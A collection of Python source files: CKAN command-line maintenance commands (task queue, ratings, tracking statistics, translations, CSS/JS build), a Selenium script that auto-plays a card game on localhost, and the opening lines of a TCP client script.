model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append['--concurrency=1']
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '%/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE t.url LIKE %s || p.name)
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors=[]
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color='#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
# check if used in js file we only include these
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
|
main.py
|
# codeing=UTF-8
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading
import time
def join_game(num):
browser = webdriver.Chrome()
browser.implicitly_wait(8)
browser.get('http://localhost:3000/game/test2')
ready_btn = browser.find_element_by_xpath('//*[@id="root"]/div/div/div/button[2]')
ready_btn.click()
browser.implicitly_wait(8)
calllord_btn = browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[1]')
calllord_btn.click()
while True:
if browser.find_element_by_xpath('//*[@id="root"]/div/div[5]/p/span').value_of_css_property('color') == "rgba(255, 255, 255, 1)":
browser.find_element_by_xpath('//*[@id="root"]/div/div[5]/img[1]').click()
browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[2]').click()
else:
browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[1]').click()
time.sleep(0.3)
if __name__ == "__main__":
threadNum = 3
threads = []
cur = 0
while cur < threadNum:
thread = threading.Thread(target=join_game, name='thread_' + str(cur), args=[cur])
threads.append(thread)
cur+=1
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
